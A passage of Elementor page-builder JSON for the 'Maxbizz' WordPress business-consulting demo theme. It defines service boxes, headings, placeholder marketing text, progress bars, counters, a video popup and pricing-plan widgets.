class=\"ot-flaticon-trajectory\"><\/i> Learn More","bg_box":"#FFFFFF","bg_hover_box":"#BF3721","bg_hover_icon_color":"#FFFFFF","bg_hover_icon_bg":"#E93613","bg_hover_des_color":"#FFFFFF","bg_hover_link_btn_color":"#FFFFFF","icon_size":{"unit":"px","size":44,"sizes":[]},"icon_bg":"#D923001A","_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"12601f0","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"405fab7","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart.svg","id":653},"library":"svg"},"title":"Business Consulting","des":"We help financial institutions, from banking and insurance to wealth.","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz-business\/our-services\/business-consulting\/","is_external":"","nofollow":"","custom_attributes":""},"btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","bg_box":"#FFFFFF","bg_hover_box":"#BF3721","bg_hover_icon_color":"#FFFFFF","bg_hover_icon_bg":"#E93613","bg_hover_des_color":"#FFFFFF","bg_hover_link_btn_color":"#FFFFFF","icon_size":{"unit":"px","size":44,"sizes":[]},"icon_bg":"#D923001A","_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"c1f2aa7","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"766ebc9","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/aim.svg","id":660},"library":"svg"},"title":"Marketing Strategy","des":"We help financial institutions, from banking and insurance to wealth.","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz-business\/our-services\/marketing-research\/","is_external":"","nofollow":"","custom_attributes":""},"btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","bg_box":"#FFFFFF","bg_hover_box":"#BF3721","bg_hover_icon_color":"#FFFFFF","bg_hover_icon_bg":"#E93613","bg_hover_des_color":"#FFFFFF","bg_hover_link_btn_color":"#FFFFFF","icon_size":{"unit":"px","size":44,"sizes":[]},"icon_bg":"#D923001A"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"8d36432","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","background_background":"classic","background_color":"#F5F5F5","padding":{"unit":"px","top":"120","right":"0","bottom":"120","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"25b1175","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin":{"unit":"px","top":"0","right":"60","bottom":"0","left":"0","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":"80","bottom":"50","left":"0","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"32585ac","elType":"widget","settings":{"sub":"about company","title":"We Provide The Solutions  to Grow Your Business","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","stitle_typography_typography":"custom","stitle_typography_font_family":"Raleway","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_typography_font_weight":"bold","stitle_typography_line_height":{"unit":"px","size":"","sizes":[]},"is_highlight":""},"elements":[],"widgetType":"iheading"},{"id":"cd4a814","elType":"widget","settings":{"editor":"<p>Our clients\u2019 needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent into the firm, acquiring new companies, and developing new capabilities, for example, in design.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"text_color":"#5F5F5F"},"elements":[],"widgetType":"text-editor"},{"id":"2a6f10e","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20","padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"1ebc074","elType":"column","settings":{"_column_size":50,"_inline_size":46.078000000000002955857780762016773223876953125,"border_border":"solid","border_width":{"unit":"px","top":"0","right":"1","bottom":"0","left":"0","isLinked":false},"border_width_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":true},"border_color":"#00000026","_inline_size_tablet":35},"elements":[{"id":"45154ae","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/signature-home3.png","id":1601},"image_size":"full","align":"left","_padding_tablet":{"unit":"px","top":"0","right":"35","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"e09f857","elType":"column","settings":{"_column_size":50,"_inline_size":53.921999999999997044142219237983226776123046875,"margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"30","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"40","isLinked":false}},"elements":[{"id":"4e94d5d","elType":"widget","settings":{"title":"Peter Adams","header_size":"h6","typography_font_family":"Roboto","typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"35e51d3","elType":"widget","settings":{"editor":"<p>co-founder of company<\/p>","text_color":"#878787","typography_typography":"custom","typography_font_family":"Raleway","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"500","typography_text_transform":"uppercase"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"063c015","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"f6a2ee6","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image1-home3.jpg","id":1607},"image_size":"full","align_tablet":"left","width_tablet":{"unit":"%","size":100,"sizes":[]},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"d0e73f5","elType":"section","settings":{"padding":{"unit":"px","top":"115","right":"0","bottom":"110","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"3178e09","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"28c073a","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"44","left":"0","isLinked":false}},"elements":[{"id":"098e07d","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"771dbaa","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"9e82b3c","elType":"widget","settings":{"sub":"our services","title":"What We Offer for You","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bottom_space":{"unit":"px","size":11,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"stitle_bg":"#4B83FC1A","is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_family":"Raleway","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_typography_font_weight":"bold"},"elements":[],"widgetType":"iheading"},{"id":"4c74254","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"963c2a8","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"8205d75","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"20","margin":{"unit":"px","top":"0","right":0,"bottom":"50","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"30","left":0,"isLinked":false}},"elements":[{"id":"6940026","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"f1eddcc","elType":"widget","settings":{"box_style":"s2","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bars-chart.svg","id":648},"library":"svg"},"title":"Audit and Assurance","des":"Discover the emerging technologies most relevant to your strategy by working with our community.","icon_color":"#FFFFFF","icon_bg":"#D92300","bg_box":"#FFFFFF","box_box_shadow_box_shadow_type":"yes","box_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"bg_hover_box":"#F5F5F5","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0, 0, 0, 0)"},"icon_bg_width":{"unit":"px","size":70,"sizes":[]},"content_padding":{"unit":"px","top":"22","right":"50","bottom":"30","left":"70","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":21,"sizes":[]},"des_color":"#60626D","hover_box_shadow_box_shadow_type":"yes","hover_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0, 0, 0, 0)"},"content_padding_mobile":{"unit":"px","top":"20","right":"30","bottom":"30","left":"50","isLinked":false},"_margin":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"},{"id":"2bad2df","elType":"widget","settings":{"box_style":"s2","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/rocket.svg","id":649},"library":"svg"},"title":"Sales and Marketing","des":"Discover the emerging technologies most relevant to your strategy by working with our community.","icon_color":"#FFFFFF","icon_bg":"#D92300","bg_box":"#FFFFFF","box_box_shadow_box_shadow_type":"yes","box_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"bg_hover_box":"#F5F5F5","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0, 0, 0, 0)"},"icon_bg_width":{"unit":"px","size":70,"sizes":[]},"content_padding":{"unit":"px","top":"22","right":"50","bottom":"30","left":"70","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":21,"sizes":[]},"des_color":"#60626D","hover_box_shadow_box_shadow_type":"yes","hover_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0, 0, 0, 0)"},"content_padding_mobile":{"unit":"px","top":"20","right":"30","bottom":"30","left":"50","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"}],"isInner":true},{"id":"fa80a22","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"2924aaf","elType":"widget","settings":{"box_style":"s2","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/portfolio.svg","id":666},"library":"svg"},"title":"Gross Tax Planning","des":"Discover the emerging technologies most relevant to your strategy by working with our community.","icon_color":"#FFFFFF","icon_bg":"#D92300","bg_box":"#FFFFFF","box_box_shadow_box_shadow_type":"yes","box_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"bg_hover_box":"#F5F5F5","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0, 0, 0, 0)"},"icon_bg_width":{"unit":"px","size":70,"sizes":[]},"content_padding":{"unit":"px","top":"22","right":"50","bottom":"30","left":"70","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":21,"sizes":[]},"des_color":"#60626D","hover_box_shadow_box_shadow_type":"yes","hover_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0, 0, 0, 0)"},"content_padding_mobile":{"unit":"px","top":"20","right":"30","bottom":"30","left":"50","isLinked":false},"_margin":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"},{"id":"e3a4a9a","elType":"widget","settings":{"box_style":"s2","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/deal.svg","id":887},"library":"svg"},"title":"Support Functions","des":"Discover the emerging technologies most relevant to your strategy by working with our community.","icon_color":"#FFFFFF","icon_bg":"#D92300","bg_box":"#FFFFFF","box_box_shadow_box_shadow_type":"yes","box_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"bg_hover_box":"#F5F5F5","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0, 0, 0, 0)"},"icon_bg_width":{"unit":"px","size":70,"sizes":[]},"content_padding":{"unit":"px","top":"22","right":"50","bottom":"30","left":"70","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":21,"sizes":[]},"des_color":"#60626D","hover_box_shadow_box_shadow_type":"yes","hover_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0, 0, 0, 0)"},"icon_size":{"unit":"px","size":50,"sizes":[]},"content_padding_mobile":{"unit":"px","top":"20","right":"30","bottom":"30","left":"50","isLinked":false}},"elements":[],"widgetType":"iiconbox2"}],"isInner":true}],"isInner":true},{"id":"eff4dd8","elType":"widget","settings":{"text":"<i class=\"ot-flaticon-trajectory\"><\/i>&nbsp; explore all services for business","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz-business\/our-services\/","is_external":"","nofollow":"","custom_attributes":""},"align":"center","typography_typography":"custom","typography_font_family":"Raleway","typography_font_size":{"unit":"px","size":13,"sizes":[]},"typography_font_weight":"600","typography_text_transform":"uppercase","button_text_color":"#D92300","background_color":"#61CE7000","text_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":true}},"elements":[],"widgetType":"button"}],"isInner":false}],"isInner":false},{"id":"6e0fa0a","elType":"section","settings":{"layout":"full_width","gap":"no","content_position":"middle","structure":"20"},"elements":[{"id":"072b0f8","elType":"column","settings":{"_column_size":50,"_inline_size":null,"background_background":"classic","background_color":"#262832","_inline_size_tablet":100},"elements":[{"id":"328a28b","elType":"section","settings":{"content_width":{"unit":"px","size":525,"sizes":[]},"css_classes":"mr_0","padding":{"unit":"px","top":"0","right":"70","bottom":"0","left":"0","isLinked":false},"padding_tablet":{"unit":"%","top":"10","right":"20","bottom":"10","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"bb90431","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"dc2da8a","elType":"widget","settings":{"sub":"company benefits","title":"Global Reach with Local  Understanding","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_family":"Raleway","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_typography_font_weight":"bold"},"elements":[],"widgetType":"iheading"},{"id":"94a543e","elType":"widget","settings":{"editor":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.<\/p>","text_color":"#CCCCCC","_padding":{"unit":"px","top":"0","right":"0","bottom":"38","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"4fc0300","elType":"widget","settings":{"title":"marketing analysis","percent":{"unit":"%","size":60,"sizes":[]},"bg_color":"#3B3D48","title_color":"#FFFFFF","per_bg":"#3B3D48","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"lbar_color":"#D92300"},"elements":[],"widgetType":"iprogress"},{"id":"89b2aea","elType":"widget","settings":{"title":"finance strategy","percent":{"unit":"%","size":80,"sizes":[]},"bg_color":"#3B3D48","title_color":"#FFFFFF","per_bg":"#3B3D48","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"lbar_color":"#D92300"},"elements":[],"widgetType":"iprogress"},{"id":"165b0ba","elType":"widget","settings":{"title":"business innovation","percent":{"unit":"%","size":58,"sizes":[]},"bg_color":"#3B3D48","title_color":"#FFFFFF","per_bg":"#3B3D48","lbar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"b242305","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"77e0f5a","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image2-home3.jpg","id":1624},"image_size":"full","_margin_mobile":{"unit":"px","top":"0","right":"-15","bottom":"0","left":"-15","isLinked":false}},"elements":[],"widgetType":"image"},{"id":"095833f","elType":"widget","settings":{"vlink":"https:\/\/vimeo.com\/87959439","btn_width":{"unit":"px","size":95,"sizes":[]},"btn_width_mobile":{"unit":"px","size":60,"sizes":[]},"btn_color":"#FFFFFF","btn_circle":"#FFFFFF","_margin":{"unit":"px","top":"-47","right":"0","bottom":"0","left":"-47","isLinked":false},"_margin_mobile":{"unit":"px","top":"-30","right":"0","bottom":"0","left":"-30","isLinked":false},"_element_width":"auto","_position":"absolute","_offset_x":{"size":50,"unit":"%"},"_offset_y":{"size":50,"unit":"%"}},"elements":[],"widgetType":"ivideopopup"}],"isInner":false}],"isInner":false},{"id":"38b57d8","elType":"section","settings":{"layout":"full_width","structure":"20","gap":"no","padding":{"unit":"px","top":"120","right":"0","bottom":"120","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"120","right":"15","bottom":"120","left":"15","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"15","bottom":"60","left":"15","isLinked":false}},"elements":[{"id":"85f5e94","elType":"column","settings":{"_column_size":50,"_inline_size":40,"_inline_size_tablet":100},"elements":[{"id":"b5e7ca6","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"2e0d24b","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[],"isInner":true},{"id":"fb5e067","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"ff4af97","elType":"widget","settings":{"sub":"how we help","title":"Align Costs with  Strategy & Focus  on Growth","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"-10","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"iheading"},{"id":"3073a91","elType":"widget","settings":{"editor":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.<\/p>","text_color":"#5F5F5F","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-10","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"289a748","elType":"column","settings":{"_column_size":50,"_inline_size":60,"_inline_size_tablet":100},"elements":[{"id":"9bcc7cf","elType":"section","settings":{"layout":"full_width"},"elements":[{"id":"ba57686","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"e47917d","elType":"widget","settings":{"align":"left","image_boxes":[{"_id":"e53f9a3","image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/features1-about-us.jpg","id":2041},"title_box":"Accounting & Finance","content_box":"A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.","link_box":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/features2-about-us.jpg","id":2042},"title_box":"Managment Skills","content_box":"A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.","link_box":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"967326f"},{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/features3-about-us.jpg","id":2043},"title_box":"Business Planning","content_box":"A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.","link_box":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"ee80265"}],"label_link":"Explore More","tshow":"3","dots":"false","loop":"true","_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"5","isLinked":false},"tshow_tablet":"2","autoplay":"false","timeout":{"unit":"px","size":9000,"sizes":[]}},"elements":[],"widgetType":"iiboxcarousel"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"b3a2296","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"62","right":"0","bottom":"55","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false},"background_background":"classic","background_color":"#F5F5F5"},"elements":[{"id":"0a406ec","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"_inline_size_mobile":50},"elements":[{"id":"669543b","elType":"widget","settings":{"title":"Trusted <br>Clients","number":"350","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"number_typography_typography":"custom","number_typography_font_size_mobile":{"unit":"px","size":36,"sizes":[]},"title_space_mobile":{"unit":"px","size":10,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":12,"sizes":[]},"number_typography_font_family":"Open Sans","number_typography_font_size":{"unit":"px","size":48,"sizes":[]},"number_typography_font_weight":"bold","title_typography_font_family":"Raleway","title_typography_font_weight":"600","title_typography_line_height":{"unit":"px","size":"","sizes":[]}},"elements":[],"widgetType":"icounter"}],"isInner":false},{"id":"0240dcd","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"_inline_size_mobile":50},"elements":[{"id":"84d6abc","elType":"widget","settings":{"title":"Finished <br>Projects","number":"215","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"number_typography_typography":"custom","number_typography_font_size_mobile":{"unit":"px","size":36,"sizes":[]},"title_space_mobile":{"unit":"px","size":10,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":12,"sizes":[]},"number_typography_font_family":"Open Sans","number_typography_font_size":{"unit":"px","size":48,"sizes":[]},"title_typography_font_family":"Raleway","title_typography_font_weight":"600","number_typography_font_weight":"bold","title_typography_line_height":{"unit":"px","size":"","sizes":[]}},"elements":[],"widgetType":"icounter"}],"isInner":false},{"id":"6912bdd","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"_inline_size_mobile":50},"elements":[{"id":"1c3601e","elType":"widget","settings":{"title":"Years of <br>Experience","number":"15","number_typography_typography":"custom","number_typography_font_size_mobile":{"unit":"px","size":36,"sizes":[]},"title_space_mobile":{"unit":"px","size":10,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":12,"sizes":[]},"number_typography_font_family":"Open Sans","number_typography_font_size":{"unit":"px","size":48,"sizes":[]},"title_typography_font_family":"Raleway","title_typography_font_weight":"600","number_typography_font_weight":"bold","title_typography_line_height":{"unit":"px","size":"","sizes":[]}},"elements":[],"widgetType":"icounter"}],"isInner":false},{"id":"5de1c45","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"_inline_size_mobile":50},"elements":[{"id":"81746d8","elType":"widget","settings":{"title":"Visited<br>Conferences","number":"36","number_typography_typography":"custom","number_typography_font_size_mobile":{"unit":"px","size":36,"sizes":[]},"title_space_mobile":{"unit":"px","size":10,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":12,"sizes":[]},"number_typography_font_family":"Open Sans","number_typography_font_size":{"unit":"px","size":48,"sizes":[]},"title_typography_font_family":"Raleway","title_typography_font_weight":"600","number_typography_font_weight":"bold","title_typography_line_height":{"unit":"px","size":"","sizes":[]}},"elements":[],"widgetType":"icounter"}],"isInner":false}],"isInner":false},{"id":"4142658","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image3-home3.jpg","id":1635},"background_position":"top center","background_repeat":"no-repeat","padding":{"unit":"px","top":"90","right":"0","bottom":"0","left":"0","isLinked":false},"overlay_blend_mode":"lighten","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"0eff66d","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"81ba039","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"bf3c526","elType":"column","settings":{"_column_size":33,"_inline_size":23,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"8b25776","elType":"column","settings":{"_column_size":33,"_inline_size":53.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"c53a51e","elType":"widget","settings":{"sub":"flexible pricing plans","title":"Choose The Best Plan","header_size":"h3","align":"center","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"23","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_color":"#FFFFFF","stitle_typography_typography":"custom","stitle_typography_font_family":"Raleway","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"ec7b314","elType":"widget","settings":{"editor":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.<\/p>","align":"center","text_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"48","left":"0","isLinked":false},"typography_font_family":"Roboto","typography_font_weight":"400"},"elements":[],"widgetType":"text-editor"},{"id":"9c84036","elType":"widget","settings":{"title_left":"Billed Monthly","title_right":"Billed Yearly","title_color":"#FFFFFF","toggle_bg":"#FFFFFF33"},"elements":[],"widgetType":"iswitcher"}],"isInner":true},{"id":"53b1504","elType":"column","settings":{"_column_size":33,"_inline_size":23,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"450a5b1","elType":"section","settings":{"gap":"extended","structure":"30","css_classes":"monthly","layout":"full_width"},"elements":[{"id":"afc0b97","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"825a9cd","elType":"widget","settings":{"title":"basic plan","price":"<sup>$<\/sup> 69","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li>Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_font_family":"Open Sans","price_typography_typography":"custom","price_typography_font_family":"Open Sans","btn_color":"#282828","hover_btn_color":"#FFFFFF"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"c64a41d","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"9b16c1b","elType":"widget","settings":{"is_featured":"yes","title":"ultra plan","price":"<sup>$<\/sup> 79","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"price_typography_typography":"custom","price_typography_font_family":"Open 